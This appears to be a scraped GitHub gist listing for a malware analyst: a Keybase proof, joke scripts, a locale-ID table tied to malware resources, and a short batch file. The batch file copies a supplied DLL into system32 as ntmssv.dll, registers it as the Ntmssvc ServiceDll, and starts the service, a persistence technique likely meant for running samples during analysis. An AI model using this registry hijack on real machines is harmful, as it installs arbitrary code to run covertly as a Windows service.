Skip to content

Instantly share code, notes, and snippets.

View matonis's full-sized avatar

Michael Matonis (ma-toe-nis) matonis

View GitHub Profile
@matonis
matonis / keybase.md
Last active July 27, 2019 14:15
keybase.md

Keybase proof

I hereby claim:

  • I am matonis on github.
  • I am matonis (https://keybase.io/matonis) on keybase.
  • I have a public key ASBLE4JT-NcsPwlCpKGThm_Ar7FysHR9b-2P45oc0dddygo

To claim this, I am signing this object:

anettuut
angiologyf
ankeritej
anpoland
charbonneauqv
copperastg
denisonoyw
hadikscx
heliochromev
kotickhs
@matonis
matonis / pdiddy.py
Last active March 11, 2016 18:57
P-Diddy Lyrics Generator
#!/usr/bin/python
from random import randint
import time
lyrics=["yeah","check it ","cmon","thank bros","sall good","sallll good","check it","yeah","yeah","uh huh","cmon","uh huh","that's right","munchies","yeah","still all good","sall good","check it","cmon","bake rolls","clothes","mansions","yachts","heh","sall good"]
while True:
print lyrics[randint(0,len(lyrics)-1)]
time.sleep(randint(3,6))
@matonis
matonis / troll_malware_name_generator.py
Created July 29, 2015 18:58
troll_malware_name_generator.py
#!/usr/bin/python
import os,sys
import random
final=[]
for i in range(int(sys.argv[1])):
final.append(chr(random.randrange(255)))
@matonis
matonis / gist:a9a3c43ce85246985c34
Created July 2, 2014 18:47
Resource Locale ID
Malaware resource locals.
Locale Language LCID Decimal Codepage
Arabic – Saudi Arabia ar ar-sa 1025 1256
Bulgarian bg bg 1026 1251
Catalan ca ca 1027 1252
Chinese – Taiwan zh zh-tw 1028
Czech cs cs 1029 1250
Danish da da 1030 1252
German – Germany de de-de 1031 1252
@ECHO OFF
echo [+] - Copying %1 as C:\Windows\system32\ntmssv.dll
copy %1 C:\Windows\system32\ntmssv.dll
echo [+] - Modifying HKLM\SYSTEM\CurrentControlSet\Services\Ntmssvc
reg add HKLM\System\CurrentControlSet\Services\Ntmssvc\Parameters /v ServiceDll /t REG_EXPAND_SZ /d C:\Windows\system32\ntmssv.dll /f
echo [+] - Starting Ntmssvc Service
net start ntmssvc